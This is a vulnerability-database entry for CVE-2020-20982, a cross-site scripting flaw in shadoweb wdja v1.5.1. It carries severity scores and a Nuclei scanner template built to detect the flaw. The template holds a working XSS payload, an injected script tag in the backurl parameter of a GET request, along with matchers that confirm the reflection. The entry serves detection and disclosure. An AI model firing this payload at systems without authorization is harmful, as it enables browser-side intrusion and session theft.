Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2020-20982
HistoryNov 22, 2021 - 3:56 p.m.

shadoweb wdja v1.5.1 - Cross-Site Scripting

2021-11-2215:56:22
ProjectDiscovery
github.com
1

6.8 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

9.6 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

9.2 High

AI Score

Confidence

High

0.021 Low

EPSS

Percentile

89.2%

shadoweb wdja v1.5.1 is susceptible to cross-site scripting because it allows attackers to execute arbitrary code and gain escalated privileges via the backurl parameter to /php/passport/index.php.

id: CVE-2020-20982

info:
  name: shadoweb wdja v1.5.1 - Cross-Site Scripting
  author: pikpikcu,ritikchaddha
  severity: critical
  description: shadoweb wdja v1.5.1 is susceptible to cross-site scripting because it allows attackers to execute arbitrary code and gain escalated privileges via the backurl parameter to /php/passport/index.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://github.com/shadoweb/wdja/issues/1
    - https://nvd.nist.gov/vuln/detail/CVE-2020-20982
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
    cvss-score: 9.6
    cve-id: CVE-2020-20982
    cwe-id: CWE-79
    epss-score: 0.02028
    epss-percentile: 0.8889
    cpe: cpe:2.3:a:wdja:wdja_cms:1.5.1:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: wdja
    product: wdja_cms
  tags: cve2020,cve,xss,wdja,shadoweb

http:
  - method: GET
    path:
      - "{{BaseURL}}/passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "location.href='</script><script>alert(document.domain)</script>"
        condition: and

      - type: word
        part: header
        words:
          - 'text/html'

      - type: status
        status:
          - 200
# digest: 490a004630440220279e03501ba082d6f13b2ee38054e5efc91620b3fe82e51ddb94bb7f89161a4b0220539bd79220bce8e69e74a7f3a255bde51c7f0305a7f50ac4dbe4b41ee6be3e43:922c64590222798bb761d5b6d8e72950

6.8 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

9.6 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

9.2 High

AI Score

Confidence

High

0.021 Low

EPSS

Percentile

89.2%

Related for NUCLEI:CVE-2020-20982